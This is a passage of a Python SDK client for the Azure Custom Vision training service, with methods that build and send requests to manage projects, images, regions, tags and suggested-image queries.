'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(updated_project, 'Project')
# Construct and send request
request = self._client.patch(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Project', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
update_project.metadata = {'url': '/projects/{projectId}'}
def export_project(
self, project_id, custom_headers=None, raw=False, **operation_config):
"""Exports a project.
:param project_id: The project id of the project to export.
:type project_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ProjectExport or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ProjectExport
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.export_project.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ProjectExport', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
export_project.metadata = {'url': '/projects/{projectId}/export'}
def create_images_from_data(
self, project_id, image_data, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the provided images to the set of training images.
This API accepts body content as multipart/form-data and
application/octet-stream. When using multipart
multiple image files can be sent at once, with a maximum of 64 files.
:param project_id: The project id.
:type project_id: str
:param image_data: Binary image data. Supported formats are JPEG, GIF,
PNG, and BMP. Supports images up to 6MB.
:type image_data: Generator
:param tag_ids: The tags ids with which to tag each image. Limited to
20.
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.create_images_from_data.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if tag_ids is not None:
query_parameters['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'multipart/form-data'
if custom_headers:
header_parameters.update(custom_headers)
# Construct form data
form_data_content = {
'imageData': image_data,
}
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, form_content=form_data_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_data.metadata = {'url': '/projects/{projectId}/images'}
def delete_images(
self, project_id, image_ids=None, all_images=None, all_iterations=None, custom_headers=None, raw=False, **operation_config):
"""Delete images from the set of training images.
:param project_id: The project id.
:type project_id: str
:param image_ids: Ids of the images to be deleted. Limited to 256
images per batch.
:type image_ids: list[str]
:param all_images: Flag to specify delete all images, specify this
flag or a list of images. Using this flag will return a 202 response
to indicate the images are being deleted.
:type all_images: bool
:param all_iterations: Removes these images from all iterations, not
just the current workspace. Using this flag will return a 202 response
to indicate the images are being deleted.
:type all_iterations: bool
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.delete_images.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if image_ids is not None:
query_parameters['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=256, min_items=0)
if all_images is not None:
query_parameters['allImages'] = self._serialize.query("all_images", all_images, 'bool')
if all_iterations is not None:
query_parameters['allIterations'] = self._serialize.query("all_iterations", all_iterations, 'bool')
# Construct headers
header_parameters = {}
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
raise models.CustomVisionErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete_images.metadata = {'url': '/projects/{projectId}/images'}
def get_image_region_proposals(
self, project_id, image_id, custom_headers=None, raw=False, **operation_config):
"""Get region proposals for an image. Returns empty array if no proposals
are found.
This API will get region proposals for an image along with confidences
for the region. It returns an empty array if no proposals are found.
:param project_id: The project id.
:type project_id: str
:param image_id: The image id.
:type image_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageRegionProposal or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageRegionProposal
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
# Construct URL
url = self.get_image_region_proposals.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str'),
'imageId': self._serialize.url("image_id", image_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageRegionProposal', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_image_region_proposals.metadata = {'url': '/projects/{projectId}/images/{imageId}/regionproposals'}
def create_images_from_files(
self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
"""Add the provided batch of images to the set of training images.
This API accepts a batch of files, and optionally tags, to create
images. There is a limit of 64 images and 20 tags.
:param project_id: The project id.
:type project_id: str
:param images:
:type images:
list[~azure.cognitiveservices.vision.customvision.training.models.ImageFileCreateEntry]
:param tag_ids:
:type tag_ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: ImageCreateSummary or ClientRawResponse if raw=true
:rtype:
~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
"""
batch = models.ImageFileCreateBatch(images=images, tag_ids=tag_ids)
# Construct URL
url = self.create_images_from_files.metadata['url']
path_format_arguments = {
'Endpoint': self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
'projectId': self._serialize.url("project_id", project_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(batch, 'ImageFileCreateBatch')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.CustomVisionErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('ImageCreateSummary', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
create_images_from_files.metadata = {'url': '/projects/{projectId}/images/files'}
def get_images_by_ids(
        self, project_id, image_ids=None, iteration_id=None, custom_headers=None, raw=False, **operation_config):
    """Get images by id for a given project iteration.

    Returns the set of images matching the given ids, optionally scoped
    to a specific iteration. When no iteration is specified the current
    workspace is queried.

    :param project_id: The project id.
    :type project_id: str
    :param image_ids: The list of image ids to retrieve. Limited to 256.
    :type image_ids: list[str]
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Image]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.get_images_by_ids.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Optional query-string parameters.
    query = {}
    if image_ids is not None:
        query['imageIds'] = self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=256, min_items=0)
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')

    # Request headers, merged with any caller-supplied ones.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and map any non-200 status to the service exception.
    request = self._client.get(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('[Image]', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_images_by_ids.metadata = {'url': '/projects/{projectId}/images/id'}
def create_images_from_predictions(
        self, project_id, images=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
    """Add the specified predicted images to the set of training images.

    Creates a batch of training images from previously predicted images.
    At most 64 images and 20 tags may be supplied per call.

    :param project_id: The project id.
    :type project_id: str
    :param images:
    :type images:
     list[~azure.cognitiveservices.vision.customvision.training.models.ImageIdCreateEntry]
    :param tag_ids:
    :type tag_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImageCreateSummary or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImageCreateSummary
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Wrap the inputs in the wire-format batch model.
    image_batch = models.ImageIdCreateBatch(images=images, tag_ids=tag_ids)

    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.create_images_from_predictions.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the body, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(image_batch, 'ImageIdCreateBatch')
    request = self._client.post(url, {}, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('ImageCreateSummary', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
create_images_from_predictions.metadata = {'url': '/projects/{projectId}/images/predictions'}
def create_image_regions(
        self, project_id, regions=None, custom_headers=None, raw=False, **operation_config):
    """Create a set of image regions.

    Accepts a batch of image regions, and optionally tags, to update
    existing images with region information. At most 64 entries may be
    supplied per batch.

    :param project_id: The project id.
    :type project_id: str
    :param regions:
    :type regions:
     list[~azure.cognitiveservices.vision.customvision.training.models.ImageRegionCreateEntry]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImageRegionCreateSummary or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImageRegionCreateSummary
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Wrap the regions in the wire-format batch model.
    region_batch = models.ImageRegionCreateBatch(regions=regions)

    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.create_image_regions.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the body, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(region_batch, 'ImageRegionCreateBatch')
    request = self._client.post(url, {}, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('ImageRegionCreateSummary', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
create_image_regions.metadata = {'url': '/projects/{projectId}/images/regions'}
def delete_image_regions(
        self, project_id, region_ids, custom_headers=None, raw=False, **operation_config):
    """Delete a set of image regions.

    :param project_id: The project id.
    :type project_id: str
    :param region_ids: Regions to delete. Limited to 64.
    :type region_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.delete_image_regions.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Required query-string parameter carrying the region ids.
    query = {
        'regionIds': self._serialize.query("region_ids", region_ids, '[str]', div=',', max_items=64, min_items=0),
    }

    # Only caller-supplied headers are sent for this operation.
    headers = dict(custom_headers) if custom_headers else {}

    # Issue the DELETE; the service signals success with 204 No Content.
    request = self._client.delete(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 204:
        raise models.CustomVisionErrorException(self._deserialize, response)
    if raw:
        return ClientRawResponse(None, response)
delete_image_regions.metadata = {'url': '/projects/{projectId}/images/regions'}
def query_suggested_images(
        self, project_id, iteration_id, query, custom_headers=None, raw=False, **operation_config):
    """Get untagged images whose suggested tags match given tags. Returns
    empty array if no images are found.

    Fetches untagged images filtered by suggested tag ids; the result is
    an empty array when nothing matches.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: IterationId to use for the suggested tags and
     regions.
    :type iteration_id: str
    :param query: Contains properties we need to query suggested images.
    :type query:
     ~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegionQueryToken
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: SuggestedTagAndRegionQuery or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.SuggestedTagAndRegionQuery
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.query_suggested_images.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # The iteration id is a mandatory query-string parameter.
    params = {
        'iterationId': self._serialize.query("iteration_id", iteration_id, 'str'),
    }

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the query token, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(query, 'SuggestedTagAndRegionQueryToken')
    request = self._client.post(url, params, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('SuggestedTagAndRegionQuery', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
query_suggested_images.metadata = {'url': '/projects/{projectId}/images/suggested'}
def query_suggested_image_count(
        self, project_id, iteration_id, tag_ids=None, threshold=None, custom_headers=None, raw=False, **operation_config):
    """Get count of images whose suggested tags match given tags and their
    probabilities are greater than or equal to the given threshold. Returns
    count as 0 if none found.

    Takes tag ids and returns the count of untagged images per suggested
    tag for the given threshold.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: IterationId to use for the suggested tags and
     regions.
    :type iteration_id: str
    :param tag_ids: Existing TagIds in project to get suggested tags count
     for.
    :type tag_ids: list[str]
    :param threshold: Confidence threshold to filter suggested tags on.
    :type threshold: float
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: dict or ClientRawResponse if raw=true
    :rtype: dict[str, int] or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Wrap the filter criteria in the wire-format model.
    tag_filter = models.TagFilter(tag_ids=tag_ids, threshold=threshold)

    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.query_suggested_image_count.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # The iteration id is a mandatory query-string parameter.
    params = {
        'iterationId': self._serialize.query("iteration_id", iteration_id, 'str'),
    }

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the filter, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(tag_filter, 'TagFilter')
    request = self._client.post(url, params, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    # '{int}' deserializes the payload as a str -> int mapping.
    deserialized = self._deserialize('{int}', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
query_suggested_image_count.metadata = {'url': '/projects/{projectId}/images/suggested/count'}
def get_tagged_images(
        self, project_id, iteration_id=None, tag_ids=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
    """Get tagged images for a given project iteration.

    Supports batching and range selection; by default only the first 50
    matching images are returned. Use the {take} and {skip} parameters to
    control how many images come back per batch. Filtering is an and/or
    relationship: with tag ids for "Dog" and "Cat", images tagged with
    Dog and/or Cat are returned.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param tag_ids: A list of tags ids to filter the images. Defaults to
     all tagged images when null. Limited to 20.
    :type tag_ids: list[str]
    :param order_by: The ordering. Defaults to newest. Possible values
     include: 'Newest', 'Oldest'
    :type order_by: str
    :param take: Maximum number of images to return. Defaults to 50,
     limited to 256.
    :type take: int
    :param skip: Number of images to skip before beginning the image
     batch. Defaults to 0.
    :type skip: int
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Image]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.get_tagged_images.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Optional query-string parameters (each sent only when provided).
    query = {}
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
    if tag_ids is not None:
        query['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0)
    if order_by is not None:
        query['orderBy'] = self._serialize.query("order_by", order_by, 'str')
    if take is not None:
        query['take'] = self._serialize.query("take", take, 'int', maximum=256, minimum=0)
    if skip is not None:
        query['skip'] = self._serialize.query("skip", skip, 'int')

    # Request headers, merged with any caller-supplied ones.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and map any non-200 status to the service exception.
    request = self._client.get(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('[Image]', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_tagged_images.metadata = {'url': '/projects/{projectId}/images/tagged'}
def get_tagged_image_count(
        self, project_id, iteration_id=None, tag_ids=None, custom_headers=None, raw=False, **operation_config):
    """Gets the number of images tagged with the provided {tagIds}.

    Filtering is an and/or relationship: with tag ids for "Dog" and
    "Cat", images tagged with Dog and/or Cat are counted.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param tag_ids: A list of tags ids to filter the images to count.
     Defaults to all tags when null.
    :type tag_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: int or ClientRawResponse if raw=true
    :rtype: int or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.get_tagged_image_count.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Optional query-string parameters.
    query = {}
    if iteration_id is not None:
        query['iterationId'] = self._serialize.query("iteration_id", iteration_id, 'str')
    if tag_ids is not None:
        query['tagIds'] = self._serialize.query("tag_ids", tag_ids, '[str]', div=',')

    # Request headers, merged with any caller-supplied ones.
    headers = {'Accept': 'application/json'}
    if custom_headers:
        headers.update(custom_headers)

    # Issue the GET and map any non-200 status to the service exception.
    request = self._client.get(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('int', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
get_tagged_image_count.metadata = {'url': '/projects/{projectId}/images/tagged/count'}
def create_image_tags(
        self, project_id, tags=None, custom_headers=None, raw=False, **operation_config):
    """Associate a set of images with a set of tags.

    :param project_id: The project id.
    :type project_id: str
    :param tags: Image Tag entries to include in this batch.
    :type tags:
     list[~azure.cognitiveservices.vision.customvision.training.models.ImageTagCreateEntry]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: ImageTagCreateSummary or ClientRawResponse if raw=true
    :rtype:
     ~azure.cognitiveservices.vision.customvision.training.models.ImageTagCreateSummary
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Wrap the tag entries in the wire-format batch model.
    tag_batch = models.ImageTagCreateBatch(tags=tags)

    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.create_image_tags.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Request headers, merged with any caller-supplied ones.
    headers = {
        'Accept': 'application/json',
        'Content-Type': 'application/json; charset=utf-8',
    }
    if custom_headers:
        headers.update(custom_headers)

    # Serialize the body, POST it, and map non-200 to the service exception.
    payload = self._serialize.body(tag_batch, 'ImageTagCreateBatch')
    request = self._client.post(url, {}, headers, payload)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 200:
        raise models.CustomVisionErrorException(self._deserialize, response)

    deserialized = self._deserialize('ImageTagCreateSummary', response)
    if raw:
        return ClientRawResponse(deserialized, response)
    return deserialized
create_image_tags.metadata = {'url': '/projects/{projectId}/images/tags'}
def delete_image_tags(
        self, project_id, image_ids, tag_ids, custom_headers=None, raw=False, **operation_config):
    """Remove a set of tags from a set of images.

    :param project_id: The project id.
    :type project_id: str
    :param image_ids: Image ids. Limited to 64 images.
    :type image_ids: list[str]
    :param tag_ids: Tags to be deleted from the specified images. Limited
     to 20 tags.
    :type tag_ids: list[str]
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: None or ClientRawResponse if raw=true
    :rtype: None or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.delete_image_tags.metadata['url'],
        Endpoint=self._serialize.url("self.config.endpoint", self.config.endpoint, 'str', skip_quote=True),
        projectId=self._serialize.url("project_id", project_id, 'str'))

    # Both id lists are mandatory query-string parameters.
    query = {
        'imageIds': self._serialize.query("image_ids", image_ids, '[str]', div=',', max_items=64, min_items=0),
        'tagIds': self._serialize.query("tag_ids", tag_ids, '[str]', div=',', max_items=20, min_items=0),
    }

    # Only caller-supplied headers are sent for this operation.
    headers = dict(custom_headers) if custom_headers else {}

    # Issue the DELETE; the service signals success with 204 No Content.
    request = self._client.delete(url, query, headers)
    response = self._client.send(request, stream=False, **operation_config)
    if response.status_code != 204:
        raise models.CustomVisionErrorException(self._deserialize, response)
    if raw:
        return ClientRawResponse(None, response)
delete_image_tags.metadata = {'url': '/projects/{projectId}/images/tags'}
def get_untagged_images(
        self, project_id, iteration_id=None, order_by=None, take=50, skip=0, custom_headers=None, raw=False, **operation_config):
    """Get untagged images for a given project iteration.

    Supports batching and range selection; by default only the first 50
    matching images are returned. Use the {take} and {skip} parameters to
    control how many images come back per batch.

    :param project_id: The project id.
    :type project_id: str
    :param iteration_id: The iteration id. Defaults to workspace.
    :type iteration_id: str
    :param order_by: The ordering. Defaults to newest. Possible values
     include: 'Newest', 'Oldest'
    :type order_by: str
    :param take: Maximum number of images to return. Defaults to 50,
     limited to 256.
    :type take: int
    :param skip: Number of images to skip before beginning the image
     batch. Defaults to 0.
    :type skip: int
    :param dict custom_headers: headers that will be added to the request
    :param bool raw: returns the direct response alongside the
     deserialized response
    :param operation_config: :ref:`Operation configuration
     overrides<msrest:optionsforoperations>`.
    :return: list or ClientRawResponse if raw=true
    :rtype:
     list[~azure.cognitiveservices.vision.customvision.training.models.Image]
     or ~msrest.pipeline.ClientRawResponse
    :raises:
     :class:`CustomVisionErrorException<azure.cognitiveservices.vision.customvision.training.models.CustomVisionErrorException>`
    """
    # Expand the URL template with the endpoint and project id.
    url = self._client.format_url(
        self.get_untagged_images.metadata['url'],
